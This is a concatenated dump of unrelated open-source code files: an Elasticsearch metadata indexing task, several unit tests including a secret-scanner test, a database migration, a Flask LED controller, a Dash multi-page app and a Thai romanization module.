from elasticsearch_dsl.document import Document
from elasticsearch_dsl.index import Index
from pyhocon import ConfigTree
from databuilder import Scoped
from databuilder.extractor.base_extractor import Extractor
from databuilder.task.base_task import Task
from databuilder.task.search.document_mappings import RESOURCE_TO_MAPPING, SearchableResource
from databuilder.transformer.base_transformer import NoopTransformer, Transformer
from databuilder.utils.closer import Closer
LOGGER = logging.getLogger(__name__)
class SearchMetadatatoElasticasearchTask(Task):
ENTITY_TYPE = 'doc_type'
ELASTICSEARCH_CLIENT_CONFIG_KEY = 'client'
MAPPING_CLASS = 'document_mapping'
ELASTICSEARCH_ALIAS_CONFIG_KEY = 'alias'
ELASTICSEARCH_NEW_INDEX = 'new_index'
ELASTICSEARCH_PUBLISHER_BATCH_SIZE = 'batch_size'
ELASTICSEARCH_TIMEOUT_SEC = 'es_timeout_sec'
DATE = 'date'
today = date.today().strftime("%Y%m%d")
def __init__(self,
extractor: Extractor,
transformer: Transformer = NoopTransformer()) -> None:
self.extractor = extractor
self.transformer = transformer
self._closer = Closer()
self._closer.register(self.extractor.close)
self._closer.register(self.transformer.close)
def init(self, conf: ConfigTree) -> None:
# initialize extractor with configurarion
self.extractor.init(Scoped.get_scoped_conf(conf, self.extractor.get_scope()))
# initialize transformer with configuration
self.transformer.init(Scoped.get_scoped_conf(conf, self.transformer.get_scope()))
# task configuration
conf = Scoped.get_scoped_conf(conf, self.get_scope())
self.date = conf.get_string(SearchMetadatatoElasticasearchTask.DATE, self.today)
self.entity = conf.get_string(SearchMetadatatoElasticasearchTask.ENTITY_TYPE).lower()
self.elasticsearch_client = conf.get(
SearchMetadatatoElasticasearchTask.ELASTICSEARCH_CLIENT_CONFIG_KEY
)
self.elasticsearch_alias = conf.get(
SearchMetadatatoElasticasearchTask.ELASTICSEARCH_ALIAS_CONFIG_KEY
)
self.elasticsearch_new_index = conf.get(
SearchMetadatatoElasticasearchTask.ELASTICSEARCH_NEW_INDEX,
self.create_new_index_name())
self.document_mapping = conf.get(SearchMetadatatoElasticasearchTask.MAPPING_CLASS,
RESOURCE_TO_MAPPING[self.entity])
if not issubclass(self.document_mapping, SearchableResource):
msg = "Provided document_mapping should be instance" \
f" of SearchableResource not {type(self.document_mapping)}"
LOGGER.error(msg)
raise TypeError(msg)
self.elasticsearch_batch_size = conf.get(
SearchMetadatatoElasticasearchTask.ELASTICSEARCH_PUBLISHER_BATCH_SIZE, 10000
)
self.elasticsearch_timeout_sec = conf.get(
SearchMetadatatoElasticasearchTask.ELASTICSEARCH_TIMEOUT_SEC, 120
)
def create_new_index_name(self) -> str:
hex_string = uuid4().hex
return f"{self.elasticsearch_alias}_{self.date}_{hex_string}"
def to_document(self, metadata: Any) -> Document:
return self.document_mapping(_index=self.elasticsearch_new_index,
**metadata)
def generate_documents(self, record: Any) -> Generator:
# iterate through records
while record:
record = self.transformer.transform(record)
if not record:
# Move on if the transformer filtered the record out
record = self.extractor.extract()
continue
document = self.to_document(metadata=record).to_dict(True)
document['_source']['resource_type'] = self.entity
yield document
record = self.extractor.extract()
def _get_old_index(self, connection: Connections) -> List[str]:
"""
Retrieve all indices that currently have {elasticsearch_alias} alias
:return: list of elasticsearch indices
"""
try:
indices = connection.indices.get_alias(self.elasticsearch_alias).keys()
return indices
except NotFoundError:
LOGGER.warn("Received index not found error from Elasticsearch. " +
"The index doesn't exist for a newly created ES. It's OK on first run.")
# return empty list on exception
return []
def _delete_old_index(self, connection: Connections, document_index: Index) -> None:
alias_updates = []
previous_index = self._get_old_index(connection=connection)
for previous_index_name in previous_index:
if previous_index_name != document_index._name:
LOGGER.info(f"Deleting old index {previous_index_name}")
alias_updates.append({"remove_index": {"index": previous_index_name}})
alias_updates.append({"add": {
"index": self.elasticsearch_new_index,
"alias": self.elasticsearch_alias}})
connection.indices.update_aliases({"actions": alias_updates})
def run(self) -> None:
LOGGER.info('Running search metadata to Elasticsearch task')
try:
# extract records from metadata store
record = self.extractor.extract()
# create connection
connections.add_connection('default', self.elasticsearch_client)
connection = connections.get_connection()
# health check ES
health = connection.cluster.health()
status = health["status"]
if status not in ("green", "yellow"):
msg = f"Elasticsearch healthcheck failed: {status}"
LOGGER.error(msg)
raise Exception(msg)
# create index
LOGGER.info(f"Creating ES index {self.elasticsearch_new_index}")
index = Index(name=self.elasticsearch_new_index, using=self.elasticsearch_client)
index.document(self.document_mapping)
index.create()
# publish search metadata to ES
cnt = 0
for success, info in parallel_bulk(connection,
self.generate_documents(record=record),
raise_on_error=False,
chunk_size=self.elasticsearch_batch_size,
request_timeout=self.elasticsearch_timeout_sec):
if not success:
LOGGER.warn(f"There was an error while indexing a document to ES: {info}")
else:
cnt += 1
if cnt == self.elasticsearch_batch_size:
LOGGER.info(f'Published {str(cnt*self.elasticsearch_batch_size)} records to ES')
# delete old index
self._delete_old_index(connection=connection,
document_index=index)
LOGGER.info("Elasticsearch Indexing completed")
finally:
self._closer.close()
def get_scope(self) -> str:
return 'task.search_metadata_to_elasticsearch'
|
test/test_detect_secrets.py | trae-horton/secret-bridge | 152 | 11087537 | import unittest
from detectors.detectsecrets import DetectSecrets
class AttrDict(dict):
"""A hacky dictionary that exposes its members as attributes.
Ex: attr_dict['foo'] == attr_dict.foo
This is to mimic the way that decoded JSON objects look (i.e. JSON
object fields are exposed attributes attributes).
"""
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
class TestDetectSecrets(unittest.TestCase):
TEST_INPUT = """my_secret_key = "<KEY>"\n"""
TEST_JSON_OUTPUT_SUBSET = """"results": {
"foo.txt": [
{
"hashed_secret": "a6846d8320dcb082eba8ab9612f8fd1df7e4a345",
"line_number": 1,
"type": "Hex High Entropy String"
}
]
}
}"""
def test_parse_example_output(self):
ds = DetectSecrets()
file_obj = AttrDict({
"filename": "secret_test.txt",
"patch": self.TEST_INPUT
})
out = ds.run('tmp_path', file_obj)
self.assertEqual(len(out), 1)
finding = out[0]
self.assertEqual(finding.secret_type, "Hex High Entropy String")
|
thrift_tools/tests/test_file_reader.py | cbweixin/thrift-tools | 222 | 11087549 | <gh_stars>100-1000
from collections import namedtuple
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import unittest
from thrift_tools.file_reader import run
from .util import get_log_path
PARAMS = [
'file',
'padding',
'protocol',
'structs',
'finagle_thrift',
'skip_values',
'pretty',
'max_messages',
'debug',
'show_holes'
]
PARAM_NAMES = ' '.join(PARAMS)
class Params(namedtuple('Params', PARAM_NAMES)):
pass
class FileReaderTestCase(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_read_structs(self):
params = Params(
file=get_log_path('structs'),
padding=0,
protocol='binary',
structs=True,
finagle_thrift=False, # ignored when structs
skip_values=False,
pretty=True,
max_messages=0,
debug=False,
show_holes=False
)
output = StringIO()
run(params, output)
self.assertIn("'field_type': 'i32', 'value': 1", output.getvalue())
def test_read_messages(self):
params = Params(
file=get_log_path('messages'),
padding=0,
protocol='binary',
structs=False,
finagle_thrift=False,
skip_values=False,
pretty=True,
max_messages=0,
debug=False,
show_holes=False
)
output = StringIO()
run(params, output)
self.assertIn('ping', output.getvalue())
self.assertIn('search', output.getvalue())
self.assertIn('reply', output.getvalue())
|
datadog_checks_base/tests/test_utils.py | vbarbaresi/integrations-core | 663 | 11087552 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from decimal import ROUND_HALF_DOWN
import mock
import pytest
from six import PY2, PY3
from datadog_checks.base.utils.common import ensure_bytes, ensure_unicode, pattern_filter, round_value, to_native_string
from datadog_checks.base.utils.containers import hash_mutable, iter_unique
from datadog_checks.base.utils.limiter import Limiter
from datadog_checks.base.utils.secrets import SecretsSanitizer
class Item:
def __init__(self, name):
self.name = name
def __eq__(self, other):
return self.name == other.name
class TestPatternFilter:
def test_no_items(self):
items = []
whitelist = ['mock']
assert pattern_filter(items, whitelist=whitelist) == []
def test_no_patterns(self):
items = ['mock']
assert pattern_filter(items) is items
def test_multiple_matches_whitelist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
whitelist = ['abc', 'def']
assert pattern_filter(items, whitelist=whitelist) == ['abc', 'def', 'abcdef']
def test_multiple_matches_blacklist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
blacklist = ['abc', 'def']
assert pattern_filter(items, blacklist=blacklist) == ['ghi']
def test_whitelist_blacklist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
whitelist = ['def']
blacklist = ['abc']
assert pattern_filter(items, whitelist=whitelist, blacklist=blacklist) == ['def']
def test_key_function(self):
items = [Item('abc'), Item('def'), Item('abcdef'), Item('ghi')]
whitelist = ['abc', 'def']
assert pattern_filter(items, whitelist=whitelist, key=lambda item: item.name) == [
Item('abc'),
Item('def'),
Item('abcdef'),
]
class TestLimiter:
def test_no_uid(self):
warning = mock.MagicMock()
limiter = Limiter("my_check", "names", 10, warning_func=warning)
for _ in range(0, 10):
assert limiter.is_reached() is False
assert limiter.get_status() == (10, 10, False)
# Reach limit
assert limiter.is_reached() is True
assert limiter.get_status() == (11, 10, True)
# Make sure warning is only sent once
assert limiter.is_reached() is True
warning.assert_called_once_with("Check %s exceeded limit of %s %s, ignoring next ones", "my_check", 10, "names")
def test_with_uid(self):
warning = mock.MagicMock()
limiter = Limiter("my_check", "names", 10, warning_func=warning)
for _ in range(0, 20):
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
for _ in range(0, 20):
assert limiter.is_reached("dummy2") is False
assert limiter.get_status() == (2, 10, False)
warning.assert_not_called()
def test_mixed(self):
limiter = Limiter("my_check", "names", 10)
for _ in range(0, 20):
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
for _ in range(0, 5):
assert limiter.is_reached() is False
assert limiter.get_status() == (6, 10, False)
def test_reset(self):
limiter = Limiter("my_check", "names", 10)
for _ in range(1, 20):
limiter.is_reached("dummy1")
assert limiter.get_status() == (1, 10, False)
limiter.reset()
assert limiter.get_status() == (0, 10, False)
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
class TestRounding:
def test_round_half_up(self):
assert round_value(3.5) == 4.0
def test_round_modify_method(self):
assert round_value(3.5, rounding_method=ROUND_HALF_DOWN) == 3.0
def test_round_modify_sig_digits(self):
assert round_value(2.555, precision=2) == 2.560
assert round_value(4.2345, precision=2) == 4.23
assert round_value(4.2345, precision=3) == 4.235
class TestContainers:
def test_iter_unique(self):
custom_queries = [
{
'metric_prefix': 'database',
'tags': ['test:database'],
'query': 'SELECT thing1, thing2 FROM TABLE',
'columns': [{'name': 'database.metric', 'type': 'count'}, {'name': 'tablespace', 'type': 'tag'}],
},
{
'tags': ['test:database'],
'columns': [{'name': 'tablespace', 'type': 'tag'}, {'name': 'database.metric', 'type': 'count'}],
'query': 'SELECT thing1, thing2 FROM TABLE',
'metric_prefix': 'database',
},
]
assert len(list(iter_unique(custom_queries))) == 1
@pytest.mark.parametrize(
'value',
[
pytest.param({'x': 'y'}, id='dict'),
pytest.param({'x': 'y', 'z': None}, id='dict-with-none-value'),
pytest.param({'x': 'y', None: 't'}, id='dict-with-none-key'),
pytest.param({'x': ['y', 'z'], 't': 'u'}, id='dict-nest-list'),
pytest.param(['x', 'y'], id='list'),
pytest.param(['x', None], id='list-with-none'),
pytest.param(('x', None), id='tuple-with-none'),
pytest.param({'x', None}, id='set-with-none'),
],
)
def test_hash_mutable(self, value):
h = hash_mutable(value)
assert isinstance(h, int)
@pytest.mark.skipif(
PY2,
reason="In Python 2, a < b when a and b are of different types returns `False` (does not raise `TypeError`)",
)
@pytest.mark.parametrize(
'value',
[
pytest.param(['x', 1], id='mixed-list'),
pytest.param(['x', [1, 2, 3]], id='mixed-list-nested-1'),
pytest.param(['x', {'y': 'z'}], id='mixed-list-nested-2'),
pytest.param(('x', 1), id='mixed-tuple'),
pytest.param({'x', 1}, id='mixed-set'),
pytest.param({'x': 1, 2: 'y'}, id='mixed-dict-keys'),
],
)
def test_hash_mutable_unsupported_mixed_type(self, value):
"""
Hashing mixed type containers is not supported, mostly because we haven't needed to add support for it yet.
"""
with pytest.raises(TypeError):
hash_mutable(value)
@pytest.mark.parametrize(
'left, right',
[
pytest.param([1, 2], [2, 1], id='top-level'),
pytest.param({'x': [1, 2]}, {'x': [2, 1]}, id='nested'),
],
)
def test_hash_mutable_commutative(self, left, right):
"""
hash_mutable() is expected to return the same hash regardless of the order of items in the container.
"""
assert hash_mutable(left) == hash_mutable(right)
class TestBytesUnicode:
@pytest.mark.skipif(PY3, reason="Python 3 does not support explicit bytestring with special characters")
def test_ensure_bytes_py2(self):
assert ensure_bytes('éâû') == 'éâû'
assert ensure_bytes(u'éâû') == 'éâû'
def test_ensure_bytes(self):
assert ensure_bytes('qwerty') == b'qwerty'
def test_ensure_unicode(self):
assert ensure_unicode('éâû') == u'éâû'
assert ensure_unicode(u'éâû') == u'éâû'
def test_to_native_string(self):
# type: () -> None
text = u'éâû'
binary = text.encode('utf-8')
if PY3:
assert to_native_string(binary) == text
else:
assert to_native_string(binary) == binary
class TestSecretsSanitizer:
def test_default(self):
# type: () -> None
secret = 's3kr3t'
sanitizer = SecretsSanitizer()
assert sanitizer.sanitize(secret) == secret
def test_sanitize(self):
# type: () -> None
secret = 's3kr3t'
sanitizer = SecretsSanitizer()
sanitizer.register(secret)
assert all(letter == '*' for letter in sanitizer.sanitize(secret))
def test_sanitize_multiple(self):
# type: () -> None
pwd1 = '<PASSWORD>'
pwd2 = '<PASSWORD>'
sanitizer = SecretsSanitizer()
sanitizer.register(pwd1)
sanitizer.register(pwd2)
message = 'Could not authenticate with password {}, did you try {}?'.format(pwd1, pwd2)
sanitized = sanitizer.sanitize(message)
assert pwd1 not in sanitized
assert pwd2 not in sanitized
|
aiida/storage/psql_dos/migrations/versions/django_0032_remove_legacy_workflows.py | mkrack/aiida-core | 153 | 11087573 | <reponame>mkrack/aiida-core
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
# pylint: disable=invalid-name,no-member
"""Remove legacy workflows
This is similar to migration 1b8ed3425af9
Revision ID: django_0032
Revises: django_0031
"""
from alembic import op
from aiida.storage.psql_dos.migrations.utils.legacy_workflows import export_workflow_data
revision = 'django_0032'
down_revision = 'django_0031'
branch_labels = None
depends_on = None
def upgrade():
"""Migrations for the upgrade."""
# Clean data
export_workflow_data(op.get_bind(), op.get_context().opts['aiida_profile'])
# drop tables (indexes are also automatically dropped)
op.drop_table('db_dbworkflowstep_sub_workflows')
op.drop_table('db_dbworkflowstep_calculations')
op.drop_table('db_dbworkflowstep')
op.drop_table('db_dbworkflowdata')
op.drop_table('db_dbworkflow')
def downgrade():
"""Migrations for the downgrade."""
raise NotImplementedError('Downgrade of django_0032.')
|
utils/fasm/test/make_blif.py | brycejh/vtr-verilog-to-routing | 682 | 11087576 | #!/usr/bin/env python3
"""
This is an utility script that generates a BLIF file with arbitrary number of
5 and 6 input LUTs. Along with LUTs their initialization content is placed
in a comment just before the '.names' directive.
"""
import random
def main():
lut_count = 35
print('.model top')
print('.inputs ' + ' '.join(['di{}'.format(i) for i in range(6)]))
print('.outputs ' + ' '.join(['do{}'.format(i) for i in range(lut_count)]))
for i in range(lut_count):
n = random.choice((5, 6))
ones = set([''.join([random.choice('01') for i in range(n)]) for j in range(2**n)])
init = 0
for one in ones:
idx = 0
for j, c in enumerate(one):
if c == '1':
idx |= (1 << (len(one)-1-j))
init |= 1 << idx
init_str = ''.join(['1' if init & (1<<j) else '0' for j in reversed(range(2**n))])
print('# {}\'b{}'.format(2**n, init_str))
print('.names ' + ' '.join(['di{}'.format(j) for j in range(n)]) + ' do{} '.format(i))
for one in ones:
print('{} 1'.format(one))
if __name__ == "__main__":
main()
|
Raspberry-Pi-Sonoff/Main.py | Aishwary912/Raspberry-Pi-Sonoff | 269 | 11087619 | <gh_stars>100-1000
from flask import Flask, render_template, request, redirect
from gpiozero import LED
from time import sleep
led = LED(2)
app = Flask(__name__)
@app.route("/")
def home():
if led.value == 1:
status = 'ON'
else:
status = 'OFF'
return render_template('home.html', status=status)
@app.route("/on")
def on():
led.on()
return "LED on"
@app.route("/off")
def off():
led.off()
return "LED off"
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8000)
|
tests/garage/tf/algos/test_reps.py | blacksph3re/garage | 1,500 | 11087634 | <filename>tests/garage/tf/algos/test_reps.py
"""
This script creates a test that fails when garage.tf.algos.REPS performance is
too low.
"""
import pytest
from garage.envs import GymEnv
from garage.np.baselines import LinearFeatureBaseline
from garage.sampler import LocalSampler
from garage.tf.algos import REPS
from garage.tf.policies import CategoricalMLPPolicy
from garage.trainer import TFTrainer
from tests.fixtures import snapshot_config, TfGraphTestCase
class TestREPS(TfGraphTestCase):
@pytest.mark.large
def test_reps_cartpole(self):
"""Test REPS with gym Cartpole environment."""
with TFTrainer(snapshot_config, sess=self.sess) as trainer:
env = GymEnv('CartPole-v0')
policy = CategoricalMLPPolicy(env_spec=env.spec,
hidden_sizes=[32, 32])
baseline = LinearFeatureBaseline(env_spec=env.spec)
sampler = LocalSampler(
agents=policy,
envs=env,
max_episode_length=env.spec.max_episode_length,
is_tf_worker=True)
algo = REPS(env_spec=env.spec,
policy=policy,
baseline=baseline,
sampler=sampler,
discount=0.99)
trainer.setup(algo, env)
last_avg_ret = trainer.train(n_epochs=10, batch_size=4000)
assert last_avg_ret > 5
env.close()
|
test_proj/blog/forms.py | Ivan-Feofanov/django-inline-actions | 204 | 11087645 | <reponame>Ivan-Feofanov/django-inline-actions
from django import forms
from . import models
class ChangeTitleForm(forms.ModelForm):
class Meta:
model = models.Article
fields = ('title',)
|
vnpy/api/femas/__init__.py | funrunskypalace/vnpy | 19,529 | 11087653 | <filename>vnpy/api/femas/__init__.py<gh_stars>1000+
from .vnfemasmd import MdApi
from .vnfemastd import TdApi
from .femas_constant import * |
docs/demos/multi_page_meta_tags/app.py | ruxi/dash-labs | 110 | 11087655 | <filename>docs/demos/multi_page_meta_tags/app.py
from dash import Dash, html, dcc
import dash
import dash_labs as dl
app = Dash(__name__, plugins=[dl.plugins.pages])
app.layout = html.Div(
[
html.H1("App Frame"),
html.Div(
[
html.Div(
[
html.Img(
src=app.get_asset_url(page["image"]),
height="40px",
width="60px",
),
dcc.Link(f"{page['name']} - {page['path']}", href=page["path"]),
],
style={"margin": 20},
)
for page in dash.page_registry.values()
]
),
dl.plugins.page_container,
]
)
if __name__ == "__main__":
app.run_server(debug=True)
|
pythainlp/transliterate/royin.py | wannaphongcom/pythai-nlp | 125 | 11087669 | <reponame>wannaphongcom/pythai-nlp
# -*- coding: utf-8 -*-
"""
The Royal Thai General System of Transcription (RTGS)
is the official system for rendering Thai words in the Latin alphabet.
It was published by the Royal Institute of Thailand.
:See Also:
* `Wikipedia <https://en.wikipedia.org/wiki/Royal_Thai_General_System_of_Transcription>`_
"""
import re
from pythainlp import thai_consonants, word_tokenize
# vowel
_vowel_patterns = """เ*ียว,\\1iao
แ*็ว,\\1aeo
เ*ือย,\\1ueai
แ*ว,\\1aeo
เ*็ว,\\1eo
เ*ว,\\1eo
*ิว,\\1io
*วย,\\1uai
เ*ย,\\1oei
*อย,\\1oi
โ*ย,\\1oi
*ุย,\\1ui
*าย,\\1ai
ไ*ย,\\1ai
*ัย,\\1ai
ไ**,\\1\\2ai
ไ*,\\1ai
ใ*,\\1ai
*ว*,\\1ua\\2
*ัวะ,\\1ua
*ัว,\\1ua
เ*ือะ,\\1uea
เ*ือ,\\1uea
เ*ียะ,\\1ia
เ*ีย,\\1ia
เ*อะ,\\1oe
เ*อ,\\1oe
เ*ิ,\\1oe
*อ,\\1o
เ*าะ,\\1o
เ*็,\\1e
โ*ะ,\\1o
โ*,\\1o
แ*ะ,\\1ae
แ*,\\1ae
เ*าะ,\\1e
*าว,\\1ao
เ*า,\\1ao
เ*,\\1e
*ู,\\1u
*ุ,\\1u
*ื,\\1ue
*ึ,\\1ue
*ี,\\1i
*ิ,\\1i
*ำ,\\1am
*า,\\1a
*ั,\\1a
*ะ,\\1a
#ฤ,\\1rue
$ฤ,\\1ri"""
_vowel_patterns = _vowel_patterns.replace("*", f"([{thai_consonants}])")
_vowel_patterns = _vowel_patterns.replace("#", "([คนพมห])")
_vowel_patterns = _vowel_patterns.replace("$", "([กตทปศส])")
_VOWELS = [x.split(",") for x in _vowel_patterns.split("\n")]
# พยัญชนะ ต้น สะกด
_CONSONANTS = {
"ก": ["k", "k"],
"ข": ["kh", "k"],
"ฃ": ["kh", "k"],
"ค": ["kh", "k"],
"ฅ": ["kh", "k"],
"ฆ": ["kh", "k"],
"ง": ["ng", "ng"],
"จ": ["ch", "t"],
"ฉ": ["ch", "t"],
"ช": ["ch", "t"],
"ซ": ["s", "t"],
"ฌ": ["ch", "t"],
"ญ": ["y", "n"],
"ฎ": ["d", "t"],
"ฏ": ["t", "t"],
"ฐ": ["th", "t"],
# ฑ พยัญชนะต้น เป็น d ได้
"ฑ": ["th", "t"],
"ฒ": ["th", "t"],
"ณ": ["n", "n"],
"ด": ["d", "t"],
"ต": ["t", "t"],
"ถ": ["th", "t"],
"ท": ["th", "t"],
"ธ": ["th", "t"],
"น": ["n", "n"],
"บ": ["b", "p"],
"ป": ["p", "p"],
"ผ": ["ph", "p"],
"ฝ": ["f", "p"],
"พ": ["ph", "p"],
"ฟ": ["f", "p"],
"ภ": ["ph", "p"],
"ม": ["m", "m"],
"ย": ["y", ""],
"ร": ["r", "n"],
"ฤ": ["rue", ""],
"ล": ["l", "n"],
"ว": ["w", ""],
"ศ": ["s", "t"],
"ษ": ["s", "t"],
"ส": ["s", "t"],
"ห": ["h", ""],
"ฬ": ["l", "n"],
"อ": ["", ""],
"ฮ": ["h", ""],
}
_THANTHAKHAT = "\u0e4c"
_RE_CONSONANT = re.compile(f"[{thai_consonants}]")
_RE_NORMALIZE = re.compile(
f"จน์|มณ์|ณฑ์|ทร์|ตร์|[{thai_consonants}]{_THANTHAKHAT}|"
f"[{thai_consonants}][\u0e30-\u0e39]{_THANTHAKHAT}"
# Paiyannoi, Maiyamok, Tonemarks, Thanthakhat, Nikhahit, other signs
r"|[\u0e2f\u0e46\u0e48-\u0e4f\u0e5a\u0e5b]"
)
def _normalize(word: str) -> str:
"""
Remove silence, no sound, and tonal characters.
ตัดอักษรที่ไม่ออกเสียง (การันต์ ไปยาลน้อย ไม้ยมก*) และวรรณยุกต์ทิ้ง
"""
return _RE_NORMALIZE.sub("", word)
def _replace_vowels(word: str) -> str:
for vowel in _VOWELS:
word = re.sub(vowel[0], vowel[1], word)
return word
def _replace_consonants(word: str, consonants: str) -> str:
_HO_HIP = "\u0e2b" # ห
_RO_RUA = "\u0e23" # ร
_DOUBLE_RO_RUA = _RO_RUA + _RO_RUA
if not consonants:
return word
skip = False
mod_chars = []
j = 0 # j is the index of consonants
for i in range(len(word)):
if skip:
skip = False
j += 1
elif word[i] not in _CONSONANTS: # word[i] is not a Thai consonant.
mod_chars.append(word[i])
elif (
len(mod_chars) == 0 and word[i] == _HO_HIP and len(consonants) != 1
): # Skip HO HIP except that HO HIP is the only one consonant
j += 1
elif (
len(mod_chars) == 0
): # The first character must be an initial consonant.
mod_chars.append(_CONSONANTS[consonants[j]][0])
j += 1
elif word[i:] == _DOUBLE_RO_RUA: # Double RO RUA is in end of word
skip = True
mod_chars.append("a")
mod_chars.append("n")
j += 1
elif word[i : i + 2] == _DOUBLE_RO_RUA:
skip = True
mod_chars.append("a")
j += 1
else: # Assume that the rest are final consonants.
mod_chars.append(_CONSONANTS[consonants[j]][1])
j += 1
return "".join(mod_chars)
# support function for romanize()
def _romanize(word: str) -> str:
word = _replace_vowels(_normalize(word))
consonants = _RE_CONSONANT.findall(word)
# 2-character word, all consonants
if len(word) == 2 and len(consonants) == 2:
word = list(word)
word.insert(1, "o")
word = "".join(word)
word = _replace_consonants(word, consonants)
return word
def romanize(text: str) -> str:
"""Render Thai words in Latin alphabet, using RTGS
Royal Thai General System of Transcription (RTGS),
is the official system by the Royal Institute of Thailand.
:param text: Thai text to be romanized
:type text: str
:return: A string of Thai words rendered in the Latin alphabet
:rtype: str
"""
words = word_tokenize(text)
romanized_words = [_romanize(word) for word in words]
return "".join(romanized_words)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.